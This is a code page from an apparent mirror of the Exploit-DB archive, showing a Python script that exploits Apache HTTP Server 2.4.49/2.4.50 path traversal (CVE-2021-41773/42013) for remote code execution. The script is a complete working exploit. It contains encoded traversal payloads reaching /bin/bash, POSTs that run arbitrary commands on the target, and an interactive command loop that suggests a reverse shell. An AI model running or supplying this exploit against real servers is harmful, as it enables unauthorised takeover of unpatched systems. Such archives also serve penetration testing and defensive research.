bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/50512.py
Offensive Security 093714dc70 DB: 2022-04-20 
21 changes to exploits/shellcodes

Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
7-zip - Code Execution / Local Privilege Escalation
PTPublisher v2.3.4 - Unquoted Service Path
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
Zyxel NWA-1100-NH - Command Injection
ManageEngine ADSelfService Plus 6.1 - User Enumeration
Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure

Scriptcase 9.7 - Remote Code Execution (RCE)
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
Easy Appointments 1.4.2 - Information Disclosure
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
REDCap 11.3.9 - Stored Cross Site Scripting
PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
2022-04-20 05:01:45 +00:00

120 lines
No EOL
4.8 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
# Credits : Lucas Schnell
#!/usr/bin/env python3
#coding: utf-8
import os
import re
import sys
import time
import requests
from colorama import Fore,Style
header = '''\033[1;91m
▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
''' + Style.RESET_ALL
if len(sys.argv) < 2 :
print( 'Use: python3 file.py ip:port ' )
sys.exit()
def end():
print("\t\033[1;91m[!] Bye bye !")
time.sleep(0.5)
sys.exit(1)
def commands(url,command,session):
directory = mute_command(url,'pwd')
user = mute_command(url,'whoami')
hostname = mute_command(url,'hostname')
advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
command = f"echo; {command};"
req = requests.Request('POST', url=url, data=command)
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
output = response.text
print(output)
if 'clear' in command:
os.system('/usr/bin/clear')
print(header)
if 'exit' in command:
end()
def mute_command(url,command):
session = requests.Session()
req = requests.Request('POST', url=url, data=f"echo; {command}")
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
return response.text.strip()
def exploitRCE(payload):
s = requests.Session()
try:
host = sys.argv[1]
if 'http' not in host:
url = 'http://'+ host + payload
else:
url = host + payload
session = requests.Session()
command = "echo; id"
req = requests.Request('POST', url=url, data=command)
prepare = req.prepare()
prepare.url = url
response = session.send(prepare, timeout=5)
output = response.text
if "uid" in output:
choice = "Y"
print( Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
print("[!] Sortie:\n\n" + Fore.YELLOW + output )
choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
if choice.lower() in ['','y','yes']:
while True:
commands(url,command,session)
else:
end()
else :
print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
except KeyboardInterrupt:
end()
def main():
try:
apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
payloads = [apache2449_payload,apache2450_payload]
choice = len(payloads) + 1
print(header)
print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
while choice >= len(payloads) and choice >= 0:
choice = int(input('[~] Choice : '))
if choice < len(payloads):
exploitRCE(payloads[choice])
except KeyboardInterrupt:
print("\n\033[1;91m[!] Bye bye !")
time.sleep(0.5)
sys.exit(1)
if __name__ == '__main__':
main()
Reference in a new issue View git blame Copy permalink